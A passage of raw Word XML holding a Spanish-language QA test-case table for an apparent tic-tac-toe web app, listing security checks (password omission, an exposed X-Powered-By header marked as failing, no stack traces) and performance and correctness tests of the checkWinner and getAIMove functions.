              <w:left w:type="dxa" w:w="60"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="60"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="00B050"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">aprobado</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Autenticación
GET /profile/search</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Usuario autenticado.
Otro usuario en BD.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">1. GET /profile/search?username=sensitiveuser con JWT.
2. Verificar ausencia de password en resultados.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">HTTP 200. Ningún resultado contiene campo password.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">HTTP 200. {"results":[{"username":"sensitiveuser","elo":1200}]}. Sin password.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="E2EFDA" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="60"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="60"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="00B050"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">aprobado</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Autenticación
GET /profile
[DEF-SEC-05]</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Backend Express corriendo.</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1. GET /profile con JWT válido.
2. Verificar header X-Powered-By en respuesta.</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Header X-Powered-By ausente.</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Header X-Powered-By: Express presente. Expone stack tecnológico al cliente.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="FCE4D6" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="60"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="60"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="C00000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">falla</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">API general</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Backend corriendo.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">1. GET /ruta-inexistente.
2. Verificar que body no contenga stack trace.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Body sin rutas internas (at Object.) ni referencias a node_modules.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Respuesta sin stack trace interno. No expone rutas del sistema.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="E2EFDA" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="60"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="60"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="00B050"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">aprobado</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:gridSpan w:val="6"/>
            <w:shd w:fill="003DA5" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">TC-R-07 — Rendimiento de checkWinner (1000 iteraciones)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Lógica de Juego
checkWinner()</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Función checkWinner importada.
Tableros de prueba definidos.</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1. Ejecutar checkWinner 1000 veces con tablero vacío.
2. Medir p95 y promedio.</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p95 ≤ 100ms. Promedio ≤ 100ms.</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p95 &lt; 1ms. Promedio &lt; 1ms. Función completa 1000 iteraciones en ~6ms.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="E2EFDA" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="60"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="60"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="00B050"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">aprobado</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Lógica de Juego
checkWinner()</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Función importada.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">1. Ejecutar 1000 iteraciones con tablero medio lleno, tablero con empate, ganador en fila y ganador en diagonal.
2. Medir p95.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">p95 ≤ 100ms en todos los escenarios.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">p95 &lt; 1ms en todos los escenarios. Función determinista y estable.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="E2EFDA" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="60"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="60"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="00B050"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">aprobado</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Lógica de Juego
checkWinner()</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Tablero con X ganador en fila.</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1. Ejecutar checkWinner 1000 veces con mismo tablero.
2. Recopilar resultados en Set.
3. Verificar unicidad.</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Set.size === 1. Resultado siempre "X".</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Set.size === 1. Resultado siempre "X". Función determinista confirmada.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="E2EFDA" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="60"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="60"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="00B050"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">aprobado</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Lógica de Juego
checkWinner()</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Tablero vacío / tablero lleno sin ganador.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">1. checkWinner(tablero_vacio) → null.
2. checkWinner(empate) → "draw".</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">null en tablero vacío. "draw" en tablero lleno sin ganador.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Retorna null en tablero vacío. Retorna "draw" en empate.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="E2EFDA" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="60"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="60"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="00B050"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">aprobado</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:gridSpan w:val="6"/>
            <w:shd w:fill="003DA5" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">TC-R-10 — Tiempo de respuesta de la IA (50 iteraciones por dificultad)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Motor IA
getAIMove() — Easy</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Funciones IA importadas.
Tableros de prueba definidos.</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1. Ejecutar getAIMove 50 veces por tablero (vacío, 3 fichas, 6 fichas, casi lleno) en modo easy.
2. Medir p95.</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p95 ≤ 2000ms. Movimiento en celda válida y vacía.</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p95 &lt; 1ms en todos los tableros easy. Movimientos aleatorios, celda siempre válida.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="E2EFDA" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="60"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="60"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="00B050"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">aprobado</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Motor IA
getAIMove() — Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Funciones IA importadas.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">1. Ejecutar 50 iteraciones por tablero en modo medium (50% random / 50% minimax).
2. Medir p95.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
